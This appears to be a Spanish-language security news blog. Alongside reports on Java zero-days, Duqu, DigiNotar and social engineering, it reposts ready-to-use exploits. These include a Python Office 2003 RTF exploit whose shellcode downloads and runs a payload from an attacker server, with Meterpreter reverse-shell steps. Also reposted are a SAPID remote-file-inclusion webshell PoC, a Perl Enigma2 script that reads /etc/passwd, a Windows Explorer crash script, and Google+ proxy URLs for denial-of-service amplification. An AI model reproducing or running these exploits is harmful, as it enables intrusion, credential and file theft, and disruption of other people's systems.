How to disable the Adobe Flash browser plug-in

Se han encontrado una gran cantidad de 0days en Flash, así que es muy importante deshabilitar este componente para evitar la ejecución de código malicioso.

En el siguiente enlace se lista el procedimiento para deshabilitar este complemento en Firefox, Chrome, Safari e Internet Explorer.

http://download.cnet.com/blog/download-blog/how-to-disable-the-adobe-flash-browser-plug-in?tag=rb_content;main

Java detrás de los ataques a Apple, Facebook y Twitter

Extracto de Hispasec

Estos últimos días se han conocido varias noticias de ataques relevantes: los ingenieros de Facebook, Twitter y Apple han sido infectados por malware en las redes internas de estas compañías. Los ataques parecen tener en común varios elementos, pero básicamente, están basados en fallos de seguridad en Java. 

El viernes 15 de febrero Facebook publicaba una nota en la que admitía que durante el mes de enero, sistemas (al parecer, portátiles) internos (probablemente de ingenieros) habían sido comprometidos con malware. No aclaraba cuántos. 

Según cuenta Facebook, una página que trataba sobre el desarrollo para móviles (al parecer iPhoneDevSDK) había sido comprometida. En ella, habían subido un exploit para Java que aprovechaba una vulnerabilidad previamente desconocida y que permitía la ejecución de código. Facebook se apresura a admitir que sus sistemas estaban completamente actualizados y que contaban con un antivirus. 

Estas medidas son necesarias (en especial la de actualizar) pero, lógicamente, insuficientes. Poco después, el día 19, Apple también admite un problema de seguridad. De nuevo, sus desarrolladores visitan una web específica para programadores y el plugin de Java hace el resto, infectando los sistemas Mac.

 Tanto Facebook como Apple aseguran que no han accedido a datos sensibles de su red y que siguen con las investigaciones. Por su parte, Facebook reportó a Oracle el fallo utilizado y fue corregido en su actualización del 1 de febrero. Precisamente ese día, Twitter admite algo parecido. Detectaron accesos a sus datos (esta vez los atacantes sí que tuvieron éxito) y los pudieron acceder a las contraseñas (afortunadamente cifradas y salteadas) de 250.000 usuarios. Aunque no acusa directamente a Java, en la misma nota recomiendan la desactivación de Java del navegador. 

 Un ataque ingenioso Los 0-day (fallos aprovechados por atacantes antes de que exista parche) solo pueden ser mitigados por la seguridad en profundidad. Curiosamente, las vulnerabilidades de este tipo están siendo muy habituales en los últimos tiempos, mientras que la seguridad en profundidad sigue olvidada en favor del mantra obsoleto que confía ciegamente en el antivirus, cortafuegos y sentido común... herramientas que por sí mismas no solucionan nada. Introducir un exploit previamente desconocido en una web visitada por programadores es una buena idea. 

Evidentemente, este fallo no solo afectó a Facebook o Apple, sino que seguro son muchos más los infectados. No se trataría por tanto de un ataque dirigido contra estas empresas, pero sí que quizás "orientado" hacia programadores, con todo lo que ello significa. El truco consistiría en esperar a que las víctimas acudieran a una web, en vez de enviar un enlace, fichero o cualquier otro señuelo como sucede habitualmente. Esto incluso lo hace menos sospechoso y las víctimas pueden sentirse mucho más confiadas en que realmente, "no han hecho nada malo". 

Usar un exploit de Java es una garantía de éxito además. Es sencillo de explotar, elude muchas restricciones sin complejidad, y está más que estudiado por la ingeniería de las mafias del malware cómo evitar la inmensa mayoría de los motores antivirus. Por si fuera poco, al esparcirse a través del navegador, se consigue entrar en las redes internas de las compañías sin demasiado esfuerzo. 

Hoy en día, pensar en que los ataques se producen desde fuera, saltando servidores, cortafuegos, IDS y otras medidas es un concepto muy de los 90. ¿Por qué pelear contra los altos y vigilados muros del castillo, si puedes "aparecer" ya dentro gracias a la magia de las vulnerabilidades en los navegadores? 

Los ataques se realizan sobre los equipos de escritorio de las personas que ya están en la red interna, y a través del navegador preferiblemente. ¿Por qué no estaban protegidos? En los últimos meses, se ha advertido desde todos los frentes que es necesario (no recomendable, sino imprescindible) desactivar Java del navegador o activarlo exclusivamente para ejecutar ciertos applets firmados muy concretos. 

Esta es una buena medida contra los 0-days que han aparecido y aparecerán contra este software. Al parecer, algunos programadores de Facebook, Twitter y Apple no lo tuvieron en cuenta. Lamentablemente, cualquier compañía puede ser comprometida de esta manera, pero el hecho de que los atacantes hayan tenido éxito a través de un software tan probadamente atacado como Java, hace que piense en que, al menos, podía haberse evitado esta vía sin demasiado esfuerzo y que se le ha puesto muy fácil a los atacantes. 

Este tipo de incidentes aporta muy mala imagen a las empresas que lo sufren. No hay más que ver el amable eufemismo usado para titular las notas de prensa en las que Twitter y Facebook admiten que han sido atacadas: "Seguimos manteniendo seguros a nuestros usuarios" y "Protegiendo a la gente de Facebook".

Microsoft Office 2003 Home/Pro 0day

#!/usr/bin/python

#
# Note from the Exploit-DB team: This might be the same bug as:
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
#

#-----------------------------------------------------------------------------------#
# Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 #
# Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges) #
#####################################################################################
# One shellcode to rule them all, One shellcode to find them, One shellcode to #
# bring them all and in the darkness bind them!! #
# #
# Greetings: offsec, corelan, setoolkit #
#####################################################################################
# (1) root@bt:~/Desktop/office# ./office2003.py #
# root@bt:~/Desktop/office# mv evil.doc /var/www/ #
# #
# (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=9988 X #
# > /var/www/magic.exe #
# #
# (3) msf exploit(handler) > exploit #
# #
# [*] Started reverse handler on 192.168.111.132:9988 #
# [*] Starting the payload handler... #
# [*] Sending stage (752128 bytes) to 192.168.111.128 #
# [*] Meterpreter session 1 opened (192.168.111.132:9988 -> 192.168.111.128:1073)#
# at 2012-01-08 18:46:26 +0800 #
# #
# meterpreter > ipconfig #
# #
# MS TCP Loopback interface #
# Hardware MAC: 00:00:00:00:00:00 #
# IP Address : 127.0.0.1 #
# Netmask : 255.0.0.0 #
# #
# AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport #
# Hardware MAC: 00:0c:29:6c:92:42 #
# IP Address : 192.168.111.128 #
# Netmask : 255.255.255.0 #
#-----------------------------------------------------------------------------------#

import binascii

filename = "evil.doc"

#-----------------------------------------------------------------------------------#
# File Structure #
#-----------------------------------------------------------------------------------#
file = (
"{\\rt##{\shp{\sp}}{\shp{\sp}}{\shp{\sp}}{\shp{\*\shpinst\shpfhdr0\shpbxcolumn\s"
"hpbypara\sh pwr2}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}{\*\*\*}{\sv{\*\*\*\*\*"
"\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*}9;2;ffffffffff")

#-----------------------------------------------------------------------------------#
# Open raw socket to download payload to parent directory as "a.exe" #
# ==> cmd execute "a.exe" #
#-----------------------------------------------------------------------------------#
magic = (
"\x65\x62\x37\x37\x33\x31\x63\x39\x36\x34\x38\x62\x37\x31\x33\x30"
"\x38\x62\x37\x36\x30\x63\x38\x62\x37\x36\x31\x63\x38\x62\x35\x65"
"\x30\x38\x38\x62\x37\x65\x32\x30\x38\x62\x33\x36\x36\x36\x33\x39"
"\x34\x66\x31\x38\x37\x35\x66\x32\x63\x33\x36\x30\x38\x62\x36\x63"
"\x32\x34\x32\x34\x38\x62\x34\x35\x33\x63\x38\x62\x35\x34\x30\x35"
"\x37\x38\x30\x31\x65\x61\x38\x62\x34\x61\x31\x38\x38\x62\x35\x61"
"\x32\x30\x30\x31\x65\x62\x65\x33\x33\x34\x34\x39\x38\x62\x33\x34"
"\x38\x62\x30\x31\x65\x65\x33\x31\x66\x66\x33\x31\x63\x30\x66\x63"
"\x61\x63\x38\x34\x63\x30\x37\x34\x30\x37\x63\x31\x63\x66\x30\x64"
"\x30\x31\x63\x37\x65\x62\x66\x34\x33\x62\x37\x63\x32\x34\x32\x38"
"\x37\x35\x65\x31\x38\x62\x35\x61\x32\x34\x30\x31\x65\x62\x36\x36"
"\x38\x62\x30\x63\x34\x62\x38\x62\x35\x61\x31\x63\x30\x31\x65\x62"
"\x38\x62\x30\x34\x38\x62\x30\x31\x65\x38\x38\x39\x34\x34\x32\x34"
"\x31\x63\x36\x31\x63\x33\x65\x38\x39\x32\x66\x66\x66\x66\x66\x66"
"\x35\x66\x38\x31\x65\x66\x39\x38\x66\x66\x66\x66\x66\x66\x65\x62"
"\x30\x35\x65\x38\x65\x64\x66\x66\x66\x66\x66\x66\x36\x38\x38\x65"
"\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x39\x34\x66\x66\x66\x66"
"\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36\x66\x36\x65\x35\x31"
"\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35\x34\x66\x66\x64\x30"
"\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35\x30\x65\x38\x37\x61"
"\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35\x31\x35\x31\x38\x64"
"\x33\x37\x38\x31\x63\x36\x65\x65\x66\x66\x66\x66\x66\x66\x38\x64"
"\x35\x36\x30\x63\x35\x32\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38"
"\x39\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x35\x62\x66\x66"
"\x66\x66\x66\x66\x34\x31\x35\x31\x35\x36\x66\x66\x64\x30\x36\x38"
"\x37\x65\x64\x38\x65\x32\x37\x33\x35\x33\x65\x38\x34\x62\x66\x66"
"\x66\x66\x66\x66\x66\x66\x64\x30\x36\x33\x36\x64\x36\x34\x32\x65"
"\x36\x35\x37\x38\x36\x35\x32\x30\x32\x66\x36\x33\x32\x30\x32\x30"
"\x36\x31\x32\x65\x36\x35\x37\x38\x36\x35\x30\x30")

#------------------------------------------------------------------------------------------------------------------------------#
# Two versions of office 2003 floating around: #
# (1) Standalone version, (2) XP Service Pack upgrade #
################################################################################################################################
# Unfortunatly though the exploit works perfectly for both versions they require different pointers to ESP... #
# #
# (1) 0x30324366 - CALL ESP - WINWORD.exe => "\x36\x36\x34\x33\x33\x32\x33\x30" #
# => http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe #
# #
# (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => "\x35\x35\x32\x36\x34\x30\x33\x30" #
# => http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe #
#------------------------------------------------------------------------------------------------------------------------------#

EIP = "\x36\x36\x34\x33\x33\x32\x33\x30" #should ascii convert the Little Endian pointer

filler = "\x30\x30\x30\x30\x38\x30\x37\x63"*2 + "\x41"*24 + "\x39\x30"*18

buffer = "\x23"*501 + "\x30\x35" + "\x30"*40 + EIP + filler + magic

#-----------------------------------------------------------------------------------#
# Since we are downloading our payload from a remote webserver there are no #
# restrictions on payload size or badcharacters... #
#-----------------------------------------------------------------------------------#

URL = "http://192.168.111.132/magic.exe"
binnu = binascii.b2a_hex(URL)

URL2 = "00"
nxt="{}}}}}}"
nxt+="\x0d\x0a"
nxt+="}"

textfile = open(filename , 'w')
textfile.write(file+buffer+binnu+URL2+nxt)
textfile.close()

SAPID 1.2.3 Stable Remote File Inclusion Vulnerability

# Exploit Title: SAPID Stable (RFI)
# Google Dork: tanyakan pada dan pemula :D
# Date: January 08 2011
# Author: Opa Yong
# Software Link: http://sourceforge.net/projects/sapid/files/sapid-cms/
# Version: SAPID 1.2.3 Stable
# Tested on: Windows XP Home Edition SP2


@POC: http://127.0.1/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?]
@POC: http://127.0.1/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?]


Pesan: Jangan pernah mengaku diri anda hacker,lebih baik orang yg di sekitar anda yg mengaku anda itu adalah hacker.


Special thanks for Dan Pemula

Enigma2 Webinterface 1.7.x 1.6.x 1.5.x (linux) Remote File Disclosure

#!/usr/bin/perl
#
# Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote root file disclosure exploit
##
# Author: Todor Donev
# Email me: todor.donev@@gmail.com
# Platform: Linux
# Type: remote
##
# Gewgle Dork: "Enigma2 movielist" filetype:rss
##
#
# Enigma2 is a framebuffer-based zapping application (GUI) for linux.
# It's targeted to real set-top-boxes, but would also work on regular PCs.
# Enigma2 is based on the Python programming language with a backend
# written in C++. It uses the [LinuxTV DVB API], which is part of a standard linux kernel.
#
# Enigma2 can also be controlled via an Enigma2:WebInterface.
##
# Thanks to Tsvetelina Emirska !!
##
use LWP::Simple;
$t = $ARGV[0];
if(! $t) {usg();}
$d = $ARGV[1];
if(! $d) {$d = "/etc/passwd";}
my $r = get("http://$t/web/about") or exit;
print "[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";
print "[+] Target: $t\n";
if ($r =~ m/(.*)<\/e2webifversion>/g){
print "[+] Image Version: $1\n";
}
if ($r =~ (m/1.6.0|1.6.1|1.6.2|1.6.3|1.6.4|1.6.5|1.6.6|1.6.7|1.6.8|1.6rc3|1.7.0/i)){
print "[+] Exploiting Enigma2 via type1 (file?file=$d)\n";
result(exploit1());
}
if ($r =~ (m/1.5rc1|1.5beta4/i)){
print "[+] Exploiting Enigma2 via type2 (file/?file=../../../..$d)\n";
result(exploit2());
}
sub usg{
print "\n[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";
print "[+] Usage: perl enigma2.pl \n";
exit;
}
sub exploit1{
my $x = get("http://$t/file?file=$d");
}
sub exploit2{
my $x = get("http://$t/file/?file=../../../..$d");
}
sub result{
my $x= shift;
while(defined $x){
print "$x\n";
print "[+] I got it 4 cheap.. =)\n";
exit;
}}

Apache Tomcat File Disclosure (Exploit)

A vulnerability in Apache Tomcat allows remote attackers to disclose the content of files stored on the remote server by exploiting a vulnerability in the way the WebDAV LOCK function handles requests.

Check that http://www.securiteam.com/exploits/6S00D1FK0K.html

Windows Explorer Denial Of Service (DOS)

# Windows 2008 SP2 RC2 Explorer Go Byebye :P
# Windows 7 Pro SP1 Explorer Go Byebye :P
# Interesting
# Brought to you by Level & z0r0 @ Smash The Stack

from win32com.shell import shell, shellcon
from os import mkdir

try:
mkdir("c:\\trigger_alt")
except:
print "[!] Trigger Directory Exists"
try:
mkdir("c:\\trigger_alt\\....")
except:
print "[!] Trigger Sub Directory Exists"

print "[!] Triggering Issue"

# This moves the directory containing the sub directory which creates the condition.
# The issue is in the function that moves the files to the recycle bin
# Replicate this using the following
# 1- mkdir c:\trigger_alt
# 2- cd c:\trigger_alt
# 3- mkdir ....\
# 4- My Computer -> c:\trigger_alt
# 5- Right Click -> Delete

shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION))

Reaver WiFi Protected Setup Exploit

# Exploit Title: Reaver WiFi Protected Setup Exploit
# Google Dork:
# Date: 28 December 2011
# Author: cheffner@tacnetsol.com
# Software Link: http://www.tacnetsol.com/products/
# Version: All 802.11 access points implementing WiFi Protected Setup and have it enabled.
# Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others
# CVE : No CVE US-CERT VU#723755

http://www.exploit-db.com/sploits/reaver-1.1.tar.gz

Elevación de privilegios a través de drivers de NVIDIA 3D

Jeong Wook Oh, un investigador de Microsoft Malware Protection Center (MMPC) ha descubierto una vulnerabilidad en los controladores NVIDIA Stereoscopic 3D (versiones 7.17.12.7536 y anteriores).

Estos drivers permiten acceder a contenido 3D con tarjetas gráficas y monitores compatibles, para proporcionar una experiencia 3D en ordenadores con estas características.

El fallo, con CVE-2011-4784, se produce al no filtrar adecuadamente los comandos recibidos. Un atacante local podría aprovechar esto para enviar comandos especialmente diseñados que se ejecutarían con permisos del sistema.

Recomendamos descargar la última versión de los controladores, que solucionan este error, desde: http://www.nvidia.com/Download/index.aspx

Duqu, ¿el nuevo malware descendiente de Stuxnet?

Alguien parece que ha tomado el código de Stuxnet y creado un nuevo malware al que se ha llamado Duqu (porque crea ficheros que comienzan con ~DQ). Es un troyano creado como un sistema de control remoto, pero parece estar orientado a infectar sistemas industriales.

Diferencias con Stuxnet

Stuxnet contenía dentro de su código la contraseña por defecto "2WSXcder" para la base de datos central del producto SCADA WinCC de Siemens. El troyano conseguía acceso de administración de la base de datos. Duqu parece que simplemente se trata de un sistema de control remoto, pero que se ha encontrado en dependencias industriales europeas.

Duqu no se replica. En este caso, parece haber aprendido la lección. En la una-al-día de octubre de 2010, "Éxitos y fracasos de Stuxnet (II)" ya se apuntaba este aspecto: "El punto débil (siempre desde el punto de vista de Stuxnet y sus creadores) ha sido solo uno: ¿por qué un gusano que se autorreplica indiscriminadamente? ¿Qué necesidad de infectar más allá de los sistemas objetivo?"

Otra diferencia muy importante y que lo aleja de la sofisticación de Stuxnet es que no contiene ningún ataque a Windows desconocido hasta el momento (0 day). Aunque Symantec no lo ha analizado por completo, parece que no contiene ninguno, mientras que Stuxnet usaba cuatro. Una permitía la ejecución de código aunque el AutoPlay y AutoRun se encontrasen desactivados. A efectos prácticos, implica que se había descubierto una forma totalmente nueva de ejecutar código en Windows cuando se inserta un dispositivo extraíble, independientemente de que se hayan tomado todas las medidas oportunas conocidas hasta el momento para impedirlo. La segunda permitía la ejecución de código a través del servicio de impresión (spooler) de cualquier Windows. En impresoras compartidas por red, el troyano podía enviar una petición al servicio y colocar archivos en rutas de sistema. Esto permitía su máxima difusión dentro de una red interna, por ejemplo. Las otras dos, permitían la elevación de privilegios.

Sin embargo, se parecen mucho en su código. Esto quiere decir o bien que las mismas personas están detrás de esta nueva creación, o bien que se ha filtrado de alguna manera el código original. Siendo sinceros, asociarlo con Stuxnet también es una forma de "vender" la noticia. El problema es que quizás, este tipo de ataques que con Stuxnet se han considerado "sofisticados" se conviertan en norma relativamente frecuente de ahora en adelante y las comparaciones sean innecesarias.

Características

Duqu parece un medio más que un fin. Ha sido usado para instalar a su vez un registrador de teclas en los sistemas infectados. En este sentido, se comporta como una botnet "tradicional" usando http y https para conectarse con su "command and control" (alojado en India), al que parece enviar información disfraza de imágenes JPG. A los 36 días, el troyano se borra a sí mismo.

Al igual que Stuxnet, se trata de un driver (.sys) firmado digitalmente por una entidad legal a la que probablemente han robado su certificado. Si Stuxnet utilizó certificados de Realtek, estos son de C-Media, una empresa de chipsets en Taiwan. Ya han sido revocados. ¿Cómo lo han hecho? Bien pueden haber sido robados, bien pueden haber sido falsificados en nombre de esa empresa. Aún no se sabe.

Cronología

La primera aparición de un componente de este troyano se da el 1 de septiembre de 2011, aunque por la fecha de compilación, se deduce que podrían haber sido creados a principios de diciembre de 2010.

En VirusTotal fue visto por primera vez ese día 1 de septiembre. Entonces era detectado por AntiVir, BitDefender, F-Secure, GData y SUPERAntiSpyware (5 de 41) por heurística. Hoy en día, lo detectan 29 de 43 motores. Esa variante nos ha llegado 8 veces. Existen dos variantes más que han sido enviadas a VirusTotal 4 veces en total.

Fuente hispasec

Los automóviles podrían incluir malware en sus software

McAfee ha publicado un informe titulado "Cuidado, Malware en camino", que describe las amenazas de seguridad en los sistemas de información en automóviles. No hay duda que vivimos en un mundo en el que crece sin cesar el número de dispositivos conectados. Si piensas  que ya hemos llegado a un límite, espera y ve lo que en los próximos 10 años se verá. El año pasado hubo 1 mil millones de dispositivos conectados, y Ericsson espera que se eleve el número a 50 mil millones en 10 años.

Con tal número de dispositivos es normal que los autos posean muchas computadoras de navegación. Hoy en día ya puede ser capaz de arrancar el coche con el teléfono, pero en el futuro las computadoras podrán hacer mucho más que eso. Se espera que los coches controlen la música y las llamadas telefónicas, sólo para empezar. Incluso, podrán valorar nuestra salud (o sueño) en tiempo real.

Afortunadamente, la mayoría de estos servicios están lejos de llegar, pero se espera que en su momento controlen incluso funciones críticas del auto. Obviamente todo esto implicará insertar computadoras en los autos. Por ello McAfee asegura que se necesitará estar prevenidos.

McAfee se asoció con Wind River y ESCRYPT para hacer un estudio sobre esta problemática. El estudio ofrece un análisis completo de los riesgos del software en los vehículos. Un hacker podría explotar las vulnerabilidades de software en tu coche para llevar a cabo una variedad de actividades que bien podrían ser mortales.

Entre ellos sobresale el poder abrir y cerrar el auto con un celular, hacer un rastreo del usuario, entre muchos otros.

Descargar BackTrack 5 R1

BackTrack es una distribución de GNU/Linux y contiene las herramientas más útiles para la realización de pruebas de penetración, análisis forense, escaneo de puertos, exploits, sniffers; anteriormente estaba basada en Slackware, sin embargo hoy en día está basada en Ubuntu y tiene soporte para 32 y 64 bits, así como la tecnología ARM.







En resumen BackTrack es todo un arsenal desarrollado por expertos de seguridad informática, lo podrás utilizar para medir el nivel de seguridad de tu organización, entre otros.

La descarga está disponible gratuitamente desde la página web del autor:
http://www.backtrack-linux.org/downloads/

Denegación de servicio usando como proxy a Google+

IHTeam ha descubierto un grave fallo de seguridad en Google, que permite a cualquier atacante con un equipo medianamente potente en cuanto a ancho de banda se refiere.

La noticia fué dada a conocer por hispasec y se puede consultar en el blog de IHTeam donde a grandes rasgos demuestran que la utilización de estos servidores Proxy se puede realizar mediante dos URLs diferentes:

* https://plus.google.com/_/sharebox/linkpreview/?c=[URL]&t=1&_reqid=[NUMEROS_ALEATORIOS]&rt=j

* https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=[URL]&container=focus

Cambiándoles ciertos parámetros ("c" para la primera URL y "url" para la segunda), se puede conseguir que en realidad, sea Google el que realice la petición a la URL indicada por parámetros. 

De esta forma, automatizando la petición paralela de varias de estas URLs mediante un script, como el que está disponible en la página de los autores, se podría conseguir generar un gran tráfico hacia el servidor que se desea atacar. Esto, sumado al gran ancho de banda que posee Google, facilitaría provocar ataques de denegación de servicio distribuidos, sin necesidad de una gran infraestructura.

El grupo de Hackers argumenta que ya se ha puesto en contacto con Google, sin embargo, no han recibido respuesta.

Demostración en Video

http://www.youtube.com/watch?v=fOP0SlDQZMw&feature=player_embedded

Certificado falso de Google

Nuevamente se presenta un ataque contra entidades certificadoras y en especial Google, el hecho es que se ha vuelto a presentar un certificado fraudulento que vuelve legítimas aquellas páginas especialmente manipuladas que suplanten las páginas del buscador ya sea mediante la infección de las DNS, edición de archivo HOSTS, etc. 

Sin embargo, y a pesar de la gravedad del asunto; ningún navegador ha actualizado sus versiones ante éste fallo de la entidad certificadora DigiNotar, aunque no se trata un fallo del navegador, si compromete la seguridad del usuario. Ya que un atacante podría redirigir el tráfico de la víctica por falsos servidores de Google, autenticarse y sin ningún problema; extraer las credenciales de la víctima. 

Los detalles de ésta noticia los pueden consultar en hispasec.

Serio bug en Mac OS X Lion permite autenticarse por OpenLDAP con cualquier contraseña

En entornos corporativos el uso de sistemas centralizados de red para la autenticación de usuarios es una práctica muy común, a la vez que recomendada y necesaria para controlar la seguridad de la organización, y el uso de árboles LDAP (Ligthweight Directory Access Protocol) es de lo más extendido.

Así, los equipos Mac OS X permiten configurar el acceso al sistema haciendo uso de un árbol LDAP, tal y como se puede ver en el artículo de cómo integrar Mac OS X en el Active Directory. De enre los árboles LDAP, uno de los más famosos es OpenLDAP, un proyecto Open Source que se utiliza en muchas organizaciones para gestionar el control de acceso a la red por medio de cuentas de usuario centralizadas y con el que puede trabajar cualquier equipo con Mac OS X Lion.

Sin embargo, como reportan varios usuarios, con Mac OS X Lion usando OpenLDAP basta con conocer el nombre de usuario, ya que permite autenticarse con cualquier contraseña, lo que puede convertirse en una pesadilla para los administradores de la seguridad de la red de muchas empresas.

Estos nombres de usuario generalmente son bastante sencillos de conocer, ya que o bien recolectando las direcciones de correo de los miembros de la empresa - que generalmente coinciden con los nombres de los usuarios - con herramientas como The Harvester que buscan las direcciones de correo de una organización indexadas en Google o usando un e-mail crawler que haga spidering en la web de la empresa, o bien usando símplemente los metadatos de los documentos ofimáticos con herramientas como FOCA o Metagoogil, es posible obtener buenas listas de posibles usuarios de una empresa.

Según reporta H-Online, Apple ha sido capaz de reproducir el fallo, y no está claro cuando va a sacar una solución, especialmente cuando ha publicado hace tan poco tiempo la actualización a Mac OS X Lion 10.7.1. Por el momento el único remedio posible es desactivar la autenticación con OpenLDAP para usuarios con Mac OS X Lion dentro de la empresa en entornos críticos y esperar que Apple saque un Security Update fuera de su ciclo de actualizaciones para solucionar este problema.

Argentina bannea a blogger

Google ha detectado que varios ISP's de Argentina han bloqueado el acceso a más de un millón de bitácoras hospedadas en la más popular red de blogs del mundo.

Los motivos del bloqueo al parecer son originados por la decisión de un juez federal argentino Sergio Torres, quien a comienzos de éste mes ordenó el cierre de varias páginas que difundieron correos electrónicos de funcionarios de Gobierno argentino, además de juecez y legistadores, entre otras personalidades públicas.

Google, por su parte, anuncia que hará lo posible por contrarrestar ésta medida que está afectando a millones de blogs, que nada tienen que ver con lo ocurrido. Google asevera que se puede bloquear el acceso a los sitios involucrados sin afectar a los demás, ésta medida la están estudiando a la brevedad y posiblemente en las próximas horas, habrá más noticias al respecto.

Por lo pronto, no he revisado si éste blog también se ha visto afectado, sin embargo, estaremos al pendiente.

Empleados, blanco fácil de hackers

Los piratas informáticos reunidos en la conferencia anual de hackers DefCon, realizada en Las Vegas (Nevada, oeste) el pasado fin de semana, confirmaron que la estupidez humana no tiene arreglo.

En esta ya famosa cita anual de hackers, una de las destrezas destacadas fue el arte de hablar a los trabajadores de una empresa u organización para conseguir información clave para acceder ilegalmente a las redes informáticas de esa entidad.

En el concurso "Schomooze (charla) contraataca" los piratas informáticos fueron desafiados a poner a prueba sus habilidades de "ingeniería social" en empresas como Apple, Oracle, Symantec y Walmart. El concurso debutó en la reunión anual de DefCon en Las Vegas el año pasado.

"Los resultados son peores que los del año pasado", dijo Chris Hadnagy, un especialista en ingeniería social que gestiona el concurso.

"Por lo que hemos encontrado, seríamos dueños de cada uno en estas empresas", dijo.

Los hackers debían convencer a los empleados en diversas empresas a revelar algo de las versiones de software utilizadas en las redes del servicio de cafetería.

Conocer detalles sobre el software de las computadoras de una compañía permite a los hackers averiguar las debilidades a explotar, y el intercambio de información operativa hace posible que alguien con intención de espiar a nivel corporativo llegue a colarse en las instalaciones.

Las artimañas más eficaces fueron las que implicaban llamar a las compañías que participaban y hacerse pasar por un cliente potencial que buscaba estar tranquilo sobre las medidas de seguridad ofrecidas, de acuerdo con Hadnagy.

Hacerse pasar por alguien que llamaba desde otro departamento en una empresa, o por un equipo de apoyo técnico remoto, también demostró ser una táctica eficaz para los piratas informáticos.

"Llamamos y conseguimos un tipo en el teléfono y tenemos todo lo que queremos", dijo Hadnagy, director de la página web social-engineer.org.

Pero convencer a empleados de tiendas minoristas fue más difícil, posiblemente porque están más acostumbrados a interactuar con los clientes, indicó Hadnagy.

Por otro lado, las mujeres parecen ser más desconfiadas que los hombres.

"Las mujeres parecen ser más conscientes de la seguridad", dijo al comentar los resultados del concurso, que serán publicados en un informe a finales de este año.

Grave fallo de seguridad en OpenSSH de FreeBSD, descubierto siete años después

Kingcope ha vuelto a hacer públicos todos los detalles de un grave fallo de seguridad en OpenSSH de FreeBSD 4, que permite ejecución remota de código. Ha creado un exploit capaz de aprovechar el fallo, y que devuelve una shell al equipo remoto sin necesidad de autenticación. El fallo se encuentra en auth2-pam-freebsd.c, un archivo de hace siete años.

El problema es grave, puesto que permite a un atacante que pueda acceder al SSH de una máquina FreeBSD, ejecutar código como root sin necesidad de autenticarse. El fallo se da en, al menos en FreeBSD 4.9 y 4.11, puesto que estas versiones vienen con OpenSSH 3.5p1 por defecto. Actualmente FreeBSD mantiene solo dos ramas, la 7 y la 8. La rama 4 se descontinuó en 2007 y el fichero problemático desapareció de FreeBSD a partir de la versión 5.2.1.

El problema está en la función pam_thread, a la hora de procesar nombres de usuario muy largos. Tanto SSH versión 1 como SSH versión 2. En versiones más modernas de FreeBSD 5.2.1, ni siquiera existe el archivo afectado auth2-pam-freebsd.c. Kingcope no ha podido determinar aún si el problema está en este OpenSSH de FreeBSD o en la propia librería PAM del sistema operativo.

Durante las pruebas, Kingcope comprobó que si lanzaba el demonio SSH desde consola como root, y proporcionaba un nombre de usuario de más de 100 caracteres de longitud, el demonio moría y se sobrescribía el registro EIP, con lo que se puede llegar a controlar por completo el flujo de instrucciones.

Kingcope (Nikolaos Rangos) suele descubrir importantes vulnerabilidades en FreeBSD y otro software popular. A finales de 2009 encontró un problema de elevación de privilegios FreeBSD. En septiembre de ese mismo año, publicó un exploit funcional que permitía a un atacante ejecutar código con permisos de SYSTEM en un servidor IIS 5.x (Internet Information Services) siempre que tuviera el FTP habilitado y accesible. En la versión 6.x, el exploit sólo permitía provocar una denegación de servicio. También en mayo de 2009, descubrió un grave fallo en WebDAV de IIS.


Más Información:

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
http://packetstormsecurity.org/files/view/102683/ssh_preauth_freebsd.txt

01/09/2009 Vulnerabilidad en el FTP de Microsoft IIS 5 permite ejecución de código
www.hispasec.com/unaaldia/3965

30/11/2009 Elevación de privilegios en FreeBSD
www.hispasec.com/unaaldia/4055

TeamPoison ataca el sitio de LulzSec

El grupo de hackers LulzSec no ha dejado de dar de que hablar, parece que están dispuestos a atacar todo lo que sea posible, como si de un deporte se tratara, pero esta vez son noticia no precisamente por haber penetrado algún otro reconocido sitio, sino porque ahora ellos fueron víctimas de un ataque.

Fuente conecti.ca

Los ‘hackers’ accedieron a las cuentas de Gmail durante meses

Los piratas que atacaron el sistema de correos Gmail de Google tuvieron acceso a varias cuentas durante muchos meses y podrían haber estado planeando un ataque más serio, dijo la experta en ciberseguridad que reveló públicamente el incidente.

Google dijo que sospechaba de que piratas chinos intentaron robar las contraseñas de cientos de poseedores de cuentas de Gmail, incluyendo las de altos cargos del Gobierno de Estados Unidos, activistas chinos y periodistas.

“No fueron sofisticados ni novedosos, pero fueron invasivos”, dijo Mila Parkour, que informó del ciberataque en febrero en su blog de malware.

“Enviar mensajes de phishing usando detalles de los correos personales leídos es invasivo. Es más, mantuvieron un acceso total a los buzones de correo electrónico durante mucho tiempo”, dijo Parkour desde Washington a Reuters. La experta usa un pseudónimo para proteger su identidad.

